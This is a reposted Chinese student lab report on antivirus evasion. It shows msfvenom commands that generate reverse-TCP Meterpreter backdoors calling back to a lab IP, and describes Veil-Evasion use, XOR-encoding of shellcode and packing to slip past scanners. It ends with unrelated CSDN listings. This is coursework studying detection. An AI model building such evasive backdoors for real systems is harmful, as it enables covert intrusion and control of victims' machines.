20155220 网络攻防技术 实验三 免杀原理与实践

于 2018-04-10 21:51:00 发布
阅读量91 收藏
点赞数
原文链接:http://www.cnblogs.com/20155220wsq/p/8783368.html
版权

网络攻防技术 实验三 免杀原理与实践

使用msf生成后门程序的检测

  • 首先我们对上次实验生成的后门exe,利用VirSCAN进行检测

1072272-20180410213221231-1849325156.png

1072272-20180410213239741-690578332.png

  • 然后我们利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138(kali ip) lport=5220 x> 5220_backjar.jar
    生成jar文件,进行检测。

1072272-20180410213426609-248274821.png

1072272-20180410213440217-1278132303.png

1072272-20180410213501069-943046790.png

使用veil-evasion生成反弹链接的可执行文件

  • 首先我们先对veil-evasion进行安装,详情可参考老师博客

  • 安装好之后,我们利用veil,指令打开veil-evasion

  • 依次用use evasionlist payloads,进入到payloads模板界面

  • 随便选择一个模板,将其复制,然后输入use 5(你所复制的模板)

  • 然后输入set LHOST kali-ipset LPORT 5220对其进行配置,然后输入generate,生成。

1072272-20180410214019331-2053802572.png

1072272-20180410214240812-1264902432.png

利用shellcode编程实现免杀

  • 首先我们输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c

  • 根据老师所给的,将其变成C语言文件,进行编译

  • 进行回连,回连成功

1072272-20180410214607166-654146099.png

1072272-20180410214621389-1485509865.png

对shellcode进行更改

  • 我首先对其进行异或,我做的为异或0x83

1072272-20180410215009048-644662916.png

  • 回连成功
    1072272-20180410215255504-720606460.png
    1072272-20180410215310384-1648476377.png

  • 进行检测,如图

1072272-20180410215336429-681720355.png

加壳

1072272-20180411144304555-2121204642.png

1072272-20180411144320735-1114292165.png

加壳后我发现了加壳后的病毒文件较之前未加壳更容易被查杀,但我发现了其中有的杀毒软件在病毒文件加壳后反而未能识别出来,而加壳后有些新的杀毒软件反而能够识别了,这我就不知所因了。

基础问题

  • 1.杀软是如何检测出恶意代码的?

    • 基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

    • .基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉。

  • 2.免杀是做什么?

    • 免杀是将二进制码隐藏,或者变形

  • 3.免杀的基本方法有哪些?

    • 改变特征码

    • 对exe可执行文件加壳:压缩壳 加密壳

    • 基于payload重新编译生成可执行文件

      实践总结与体会

      本次实验过程颇为曲折,首先在下载veil过程中无法安装,再三尝试后只得拷了一个虚拟机;
      然后对shellcode代码更改后,回连出现了失败,在组长的指导下顺利解决了该问题。
      通过本次实验,突然发现稍稍修改病毒就可以骗过好多杀毒软件,让我对现在电脑的安全性有了重新的审视;
      最后我还是赶紧去给电脑杀毒了。

转载于:https://www.cnblogs.com/20155220wsq/p/8783368.html

weixin_30472035
关注
西南科技大学网络攻防与对抗实验三,ARP欺骗实验
06-02
实验旨在帮助学生深入理解ARP欺骗的原理,掌握其实施步骤,并通过使用Cain工具进行实践操作,增强对网络安全攻防的理解。 **二、实验环境与工具** 实验环境包括两台虚拟机:一台运行Windows XP作为攻击者,另一...
天津理工大学信息安全专业网络攻防实验2
11-28
实验报告详细介绍了天津理工大学信息安全专业的一次网络攻防实验,主要关注的是缓冲区溢出攻防技术实验的目的是让参与者掌握Shellcode的编写流程,理解缓冲区溢出的原理,以及如何利用缓冲区溢出漏洞。实验工具是...
网络攻防原理第01讲网络对抗概述
10-28
网络攻防原理课程中,我们将探讨网络安全事件、网络对抗相关概念、网络攻击概述等基本知识,并掌握常见网络攻击及防护技术的基本原理和方法。通过本课程的学习,学生将具备基本的网络安全知识和技能,为后续学习和...
天津理工大学信息安全网络攻击预防与技术实验4
11-28
实验报告——天津理工大学《网络攻击与防御技术实验四:综合实验——木马病毒的预防与技术 实验目的: 1. 了解和认识木马病毒的概念,理解其潜在的危害,增强安全意识。 2. 深入探讨木马病毒的特征和运行机制,...
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
此外,通过亲自动手实践,加深了对网络攻防技术的理解,认识到网络安全的重要性,以及持续学习和改进防护策略的必要性。 实验过程记录: 在整个实验过程中,我们注意到捕获的数据包包含了登录时的用户名和密码尝试...
基于Java语言的Git版本控制设计源码学习指南
09-25
该项目是针对Git版本控制的Java语言设计源码,包含88个文件,其中74个为XML配置文件,3个为Markdown文档,3个为Java源代码文件,2个为Git忽略文件,2个为属性文件,1个为授权文件,以及1个IntelliJ IDEA项目文件和1个Maven构建文件。此项目旨在帮助开发者深入理解Git在Java项目中的应用与实践
基于国产自研的简洁易扩展warm-flow工作流设计源码
09-25
本项目为国产自研的warm-flow工作流设计源码,采用简洁的架构设计,仅需6张基础表,却能实现全面的功能。代码结构清晰,组件独立且易于扩展,非常适合中小型项目使用。源码包含215个文件,涵盖158个Java源文件、32个XML配置文件、7个SQL文件等,旨在为用户提供高效、灵活的工作流解决方案。
利用 TensorFlow 训练自己的目标识别器。(毕设&课设&实训&大作业&竞赛&项目)
最新发布
09-25
利用 TensorFlow 训练自己的目标识别器。本文内容来自于我的毕业设计,基于 TensorFlow 1.15.0,其他 TensorFlow 版本运行可能存在问题。.zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
基于PHP的雷劈网二维码生成器设计源码
09-25
该项目是一款基于PHP的雷劈网二维码生成器开源源码,总文件量达434个,涵盖340个PHP文件、14个HTML文件、12个CSS文件、9个JavaScript文件,以及其他C, C语言相关文件。软件由驰骋公司收购并维护,继续秉持开源精神。项目文档包括JPG、TTF、TPL、YAML、MD、PNG等多种格式,旨在提供便捷的二维码生成解决方案。支持项目持续发展,欢迎右上角star支持。
基于Java开发的Cloud HIS系统门诊挂号模块设计源码
09-25
本项目为基于Java语言的Cloud HIS系统门诊挂号模块设计源码,包含20个文件,包括8个Java源文件、3个XML配置文件、2个Markdown文件、1个Git忽略文件、1个JAR包文件、1个属性文件、1个LICENSE文件、1个Maven构建文件和1个YAML配置文件。该模块涵盖门诊挂号、病人挂号、就诊卡/身份证读取挂号以及病人档案录入等功能。
我FPGA实训课的代码以及工程文件.zip(课设&实训&大作业&竞赛&项目)
09-25
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
源享科技STM32学习开发板芯片资料CH340
09-25
源享科技STM32学习开发板芯片资料CH340
基于Taro + Dva的React时装衣橱跨端适配设计源码
09-25
该项目为基于React的Taro + Dva框架构建的时装衣橱应用源码,支持微信、百度、支付宝小程序、H5及React-Native等多个平台。源码包含155个文件,涵盖56个PNG图片、50个JavaScript脚本、18个SCSS样式、13个CSS样式、5个JPG图片、3个JSON数据文件、2个Markdown文档、2个HTML文件,以及editorconfig和eslintrc配置文件。该应用旨在提供一个跨端适配的时尚衣物管理解决方案。
省电赛安全驾驶监测助手.zip(毕设&课设&实训&大作业&竞赛&项目)
09-25
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
中秋主题中秋主题-Html5宣传动画网页PGJ.zip
09-25
[中秋主题]中秋主题--Html5宣传动画网页【PGJ】.zip [中秋主题]中秋主题--Html5宣传动画网页【PGJ】.zip [中秋主题]中秋主题--Html5宣传动画网页【PGJ】.zip
“人力资源+大数据+薪酬报告+涨薪调薪”
09-25
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
基于java的药店管理系统的开题报告.docx
09-25
基于java的药店管理系统的开题报告.docx
YOLOv10目标检测算法的应用实例与性能分析
09-25
内容概要: 介绍YOLOv10的目标检测技术及其最新进展。首先概述YOLOv10的架构特点,包括更深的网络结构,特征金字塔融合机制和先进的损失函数设计等方面的技术优势; 焨接通过两个案例分析,展示了YOLOv10如何应用于交通标志识别以及行人监测的具体流程:涵盖了数据预处理、模型调优直至实施检测全过程。 适用人群:面向从事AI视觉研究的从业人员,尤其关注物体识别领域的学者和技术人员。 使用场景及目标: 可用于诸如智能安防系统、无人驾驶汽车或是工业自动化质量控制系统等多种场合下进行快速精确的对象定位;同时也可用作学术探讨的依据或作为教育辅助材料供学生掌握深度神经网络对象定位技术的基础概念与方法论 其他说明:此外还讨论了一些重要的注意事项,例如如何预防模型过配问题和使用一些后续算法(像NMS非极大值抑制)改善预测的质量等细节操作
基于74HC138的3-8译码器设计文档.doc
09-25
课程设计题目及要求 器件名称:3-8译码器的74HC138芯片 要求电路性能指标: ⑵驱动10个LSTTL电路(相对于15PF电容负载) ⑶于VDD=3.3V,VOH=3V,VOL=0.3V ⑷tTLH/tTHL=10ns; ⑷tPLH/tPHL(A1、A2、A3→Y)=15ns; ⑸tPHL/ tPLH(S1、S2、S3→Y)=17ns ⑹Pdis≤200mW,fwork=15MHZ 1.2.2 课程设计的内容 1.功能分析及逻辑设计; 2.电路设计及器件参数计算; 3.估算功耗与延时; 4.电路模拟与仿真; 5.版图设计; 6.版图检查:DRC与LVS; 7.后仿真 8.版图数据提交。
网络攻防对抗实验教程:攻防策略与技术实践
"《网络攻防对抗》是西南科技大学计算机科学与技术学院的一本实验教材,旨在教授学生网络攻防的基本技能和理论。该书涵盖了网络攻击和防御两个主要方面,帮助学生理解网络攻击的步骤、技术原理和防御措施,以提升...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值